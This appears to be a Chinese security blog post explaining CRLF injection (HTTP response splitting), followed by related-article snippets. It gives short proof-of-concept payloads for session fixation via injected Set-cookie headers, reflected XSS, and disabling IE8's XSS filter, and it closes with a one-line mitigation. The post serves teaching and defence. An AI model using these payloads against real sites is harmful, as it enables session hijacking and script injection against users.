CRLF注入漏洞

最新推荐文章于 2024-07-31 21:30:00 发布
最新推荐文章于 2024-07-31 21:30:00 发布
阅读量1.1w 收藏 9
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Liuhuaijin/article/details/77449579
版权

CRLF是“回车+换行”(\r\n)的简称,其十六进制编码分别为0x0d和0x0a。在HTTP协议中,HTTP header与HTTP Body是用两个CRLF分隔的,浏览器就是根据这两个CRLF来取出HTTP内容并显示出来。所以,一旦我们能够控制HTTP消息头中的字符,注入一些恶意的换行,这样我们就能注入一些会话Cookie或者HTML代码。CRLF漏洞常出现在Location与Set-cookie消息头中。

1.通过CRLF注入构造会话固定漏洞

请求参数:http://www.sina.com%0aSet-cookie:sessionid%3Dwoyun

服务器返回:

HTTP/1.1 200 OK

Location:http://www.sina.com

Set-cookie:sessionid=woyun

2.通过CRLF注入消息头引发XSS漏洞

在请求参数中插入CRLF字符:?email=a%0d%0a%0d%0a<script>alert(/xss/);</script>

服务器返回:

HTTP/1.1 200 OK

Set-Cookie:de=a


<script>alert(/xss/);</script>

原理:服务器端没有过滤\r\n,而又把用户输入的数据放在HTTP头中,从而导致安全隐患。

3.浏览器的Filter是浏览器应对一些反射型XSS做的保护策略,当url中包含XSS相关特征的时候就会过滤掉不显示在页面中。

通过在数据包中http头中注入X-XSS-Protection: 0,关闭IE8的XSS Filter功能。

?url=%0aX-XSS-Protection:%200%0d%0a%0d%0a<img%20src=1%20οnerrοr=alert(/xss/)>

对抗CRLF只需过滤掉"\r","\n"之类的换行符即可


玄瞋
关注
Java代码审计之CRLF漏洞详解
悦分享
01-23 388
RLF是”回车+换行”(\r\n)(编码后是%0D%0A)的简称,在HTTP,HTTP Header和HTTP Body是用两个CRLF来分割的,浏览器就是根据这两个CRLF来取出HTTP 内容并显示出来。键盘上的回车键(Enter)就可以执行该操作。但是不同的操作系统,行的结束符是不一样的:Windows:使用CRLF表示行的结束Linux/Unix:使用LF表示行的结束MacOS:早期使用CR表示,现在好像也用LF表示行的结束。
复现awvs——CRLF注入漏洞
记录并分享学习安全的知识点..
01-10 4057
一、CRLF介绍 CRLF是Carriage-Return Line-Feed的缩写,意思是回车换行,就是回车(CR, ASCII 13, \r)、 换行(LF, ASCII 10, \n)。换行在有的ASCII码表也用newline(简nl)来进行表示,这里的lf是line feed的概念,意思是一样的。 注:CRLF命令它表示是键盘上的"Enter"键(可以用来模拟回车键)。 Windows:使用CRLF表示行的结束 Linux/Unix:使用LF表示行的结束 二、CRLF注入 就是说
回车换行问题
rosi1124的专栏
01-15 589
问题描述:    表单的textArea换行的内容,提交之后保存到数据库,再读取出来的时候,没有换行,全部连在一起了。解决:1. 在写入数据库的时候,加入      sContent=sContent.replaceAll(" "," ");    sContent=sContent.replaceAll("/r/n","");      sContent=sContent.rep
AI问答:理解CRLF和LF / 两者区别 / 在编程和文件处理的影响
最新发布
snowball的博客
07-31 765
CRLF和LF是文本处理用于表示换行的两种不同方式,它们之间的主要区别在于表示方式(CRLF使用\r\n,LF使用\n)和历史背景(CRLF起源于早期打字机,LF是Unix/Linux系统的选择)。在编程和文件处理,了解这两种换行符的差异和影响是非常重要的,以确保文件的正确性和一致性。:起源于早期的打字机和电传打字机,这些设备在打印完一行后,需要先将打印头移回到行首(回车),然后再移动到下一行(换行)。vscode这里的CRLF,点击后有CRLF和LF的两个选项,本文我们理解CRLF 和 LF。
Web安全CRLF注入漏洞
weixin_44431280的博客
02-10 3497
CRLF注入漏洞详解: CRLF简介:CRLF指的就是回车符(CR,ASCII-13,\r,%0d)和换行符(LF,ASCII-10,\n,%0a),操作系统就是通过这个标识进行换行的,相当于我们键盘的回车键。 HTTP协议CRLF:在HTTP协议报文CRLF随处可见,请求行与请求头通过一个CRLF(\r\n)隔开,请求头(header)和请求主题(body)之间通过两个CRLF(\r\n)隔开,如下图: CRLF注入漏洞简介:由于服务端未对用户输入的参数进行过滤,攻击者可通过构造恶意的HTTP请
CRLF注入漏洞、URL重定向、资源处理拒绝服务详细介绍(附实例)
ran的博客
04-26 4334
1.随便访问一个页面,这里以baidu.com为例。2.将其数据包复制一部分出来。3. 当我们在url的后面加上/search时,数据包内的GET后也会对应增加。4.当我们在其后面加入换行的符号,然后再加上host=www.xiaodi8.com,数据包下面就会多出来一行内容。5.那么此时就可能会将数据包里host标识后面的值给覆盖获取取代掉,此时就可能会发生重定向。6.这种漏洞很容易进行检测。
crlf注入漏洞复现
08-09
CRLF注入漏洞是一种常见的网络安全漏洞,它在代码未对输入进行正确的过滤和验证,导致攻击者可以利用换行符(CRLF:Carriage Return Line Feed)来执行恶意代码或实施其他攻击。 要复现CRLF注入漏洞,首先需要...
log4j 安全问题验证demo & CRLF注入漏洞
weixin_42299862的博客
12-31 7756
一、环境准备 https://blog.csdn.net/weixin_42299862/article/details/111993837 二、demo 1、使用 @Log4j2 log.error() 打印异常日志是否会泄露敏感信息? https://www.cnblogs.com/huanghuanghui/p/11775731.html https://www.cnblogs.com/qlqwjy/p/7192947.html 代码如下 如果有红线语法错误,参考https://blog.csdn.n
每日漏洞 | CRLF注入
03-12 369
每日漏洞 | CRLF注入
CRLF注入原理
墨痕诉清风的博客
12-02 3119
CRLF 指的是回车符(CR,ASCII 13,\r,%0d) 和换行符(LF,ASCII 10,\n,%0a),操作系统就是根据这个标识来进行换行的,你在键盘输入回车键就是输出这个字符,只不过win和linux系统采用的标识不一样而已。
NGINX-CRLF注入漏洞
大方子
07-28 2191
复现环境 centos7 docker nginx 复现过程 现在纯净的CentOS7上安装Docker curl -sSL https://get.daocloud.io/docker | sh 等Docker安装完毕后,在启动docker服务 service docker start 然后接下来要安装docker-compose 先安装python-pip y...
CRLF注入漏洞(响应截断)攻击实战
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
12-28 8945
CRLF是CR和LF两个字符的拼接,它们分别代表”回车+换行”(\r\n)。CRLF可以深度利用,造成反射型XSS攻击,会话固定等漏洞CRLF造成XSS漏洞
WEB攻防-通用漏洞&CRLF注入&URL重定向&资源处理拒绝服务
siu~
12-04 1804
#知识点: 1、CRLF注入-原理&检测&利用 2、URL重定向-原理&检测&利用 3、Web拒绝服务-原理&检测&利用
CRLF注入漏洞原理
凝聚力安全团队
01-29 3306
漏洞原理   CRLF注入漏洞又称HTTP响应拆分漏洞(HTTP Response Splitting),攻击方式是将回车符、换行注入到HTTP的响应包。   HTTP响应包通常以两个换行符,去划分响应头与响应正文两个部分。当用户的操作足以控制响应头的内容时,将会出现CRLF漏洞换行符、回车回车符(CR,ASCII 13,\r,%0d) 换行符(LF,ASCII 10,\n,%0a) 漏洞环境搭建及复现讲解 漏洞源码: <?php $test = $_POST['test'];
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值